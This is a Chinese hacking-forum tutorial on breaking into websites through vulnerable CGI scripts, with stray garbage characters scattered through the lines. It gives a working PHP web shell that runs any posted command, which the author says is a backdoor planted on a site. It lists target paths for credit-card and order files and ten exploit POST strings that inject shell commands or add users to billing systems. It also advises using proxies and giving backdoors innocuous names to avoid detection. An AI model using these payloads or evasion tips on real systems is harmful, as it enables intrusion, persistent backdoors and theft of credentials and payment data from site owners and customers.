CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
: h" ^" Z2 m" m* D1 N' Q8 v4 |* l很开心来到贵论坛
4 O! l' ^, W( c4 z# ?这里让我感觉 很有技术交流的感觉
我会长长来玩的
* `0 ~5 a4 b7 [8 d前言:
0 h) ]7 f' |( I. {8 @/ k以下讲解针对欧美日本网站
, T' i+ o: Y, B# v當我們在做滲透分析的時候 方法有很多
  r0 R5 Q0 _8 }% q5 f我门都知道 国外伺服器大多是linux 平台
- i5 I" g# e3 {* y* Y所以有很多网站程序有6成都会使用cgi 脚本来管理
5 w4 o0 N( A7 X% b* H目录为/cgi-bin/
! Q# u) c2 [" \9 d8 _. c
只是个人在实务上一些经验
. M: P* J, U4 O; N! J7 W8 K% `4 O& r写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
' O3 ~" P2 h( u( ]% O
以下内容跟帖回复才能看到
==============================
, O$ ~9 ?) Z) a3 l+ H2 V
第1部份: 何谓Shell?
7 d4 L1 W7 Q6 ]3 e* t$ E9 B3 ?Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
: W+ c7 c& \" h8 S7 B* x' ]A shell is the program which reads user input from the command line and executes actions based upon that input.
; W7 y4 F* f6 b意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
2 c/ c. _$ H  e) W) r1 {3 O4 I
$ F- L5 Z; q2 j* C! ~8 `! }: e* d对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
# y. f1 S" L5 z( o6 p要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
- I' t( s  |4 Y. w7 X3 {所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

1 Y* G9 T$ G# y3 L7 O$ w第2部份: Unix 指令
5 ~$ u0 L( Y' ^/ i  ]- E9 s$ f6 @以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
( p" Z6 [" B1 R3 b* e5 a/ a5 w+ a如 /home/www/site.com/cgi-bin/
% b- Y* Q1 v& d# d" s( B  U$ kls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
! u2 l5 P! M  F  X/ P1 d6 ~ls ../ -al: 详细列出上一层的资料夹及档案
, `* @# ]! X0 p  M: [3 [cat: 显示档案内容
/ ]  _: ?+ a5 B+ A! gcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
& [, k9 R4 U& G* Q* U6 ~" zwho: 显示谁login 至系统
  R9 L/ s: l( Q1 A7 iman: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
6 `" d/ U. c# D& @5 rrmdir 删除目录
mv 移动档案
rm 删除档案
- |) I$ t4 r  ^" b/ e2 ~
- N' f) I8 j1 k6 m第3部份: Shell的使用
1 B& m- _+ Z4 }; O6 y! c3 p( C例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
, K( c, }" l) t! [: Q3 _<Form Action="#" Method="POST">
" F- V$ x/ c9 |4 `" `<Input type="text" name="cmd">
<Input type="Submit">
& {1 f# j3 z* m$ o2 a6 }</Form>
0 i2 J0 q, z) I9 L9 V" D  Q<?php
% |7 }8 A; _! m, J7 X6 C. u% z9 [& b& x1 ?$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
?>
9 S5 `4 {+ f# a8 A7 o输入pwd, 可得到绝对路径:
  U4 v( e( g8 K0 U* G4 O/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
3 }, R3 b, M% [/ ~
第4部份: 注意事项
- 使用匿名代理, 保障自己
4 Y6 A& G( k" G+ B- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
1 R2 z0 j( f& o& i, V6 P) @. S- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
1 _$ F; s/ e3 s$ K4 G+ N- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- F: ^9 j# G$ S/ l- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
( k* _& Z' _6 I/ g0 }+ D+ E在这里提供一些方法思路让大家学习一下

7 D7 B5 y5 Y3 Q0 p9 |1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
E表
8 q$ b7 |3 M9 C0 x5 G* @) ?如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
: K' y( ]% d0 v* N* Y4 r8 S8 e( O/Admin_files/order.log
/orders/mountain.cfg
& B) D5 u3 d( c( G6 p( n/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
/ t. j! G: R: s, O( v
9 m/ E& ?' w- f9 B, j2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
; ?% G3 n: W3 r% m; R+ }/ S: u一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
  B" f" R6 a3 C8 S2 J' F- f  b因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

  d, n  N& m0 h. y4 c7 e1 E以下我提供10个 cgi 洞以及使用方法post
, v1 v# {- B" U( ?, ~7 o3 p让大家可以针对网站去做扫描  
/index.cgi
7 p; Z" i& s8 L4 ?+ g5 r6 U8 twei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
0 b& A  ^0 i! N/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
1 C" X" x  B- @) N2 K) |  H2 w+ C/form.cgi
" A5 m- P; B2 z# D/ K8 z9 ]name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ X' c% d0 \% A/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
# J- J2 J" H, ]% o/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持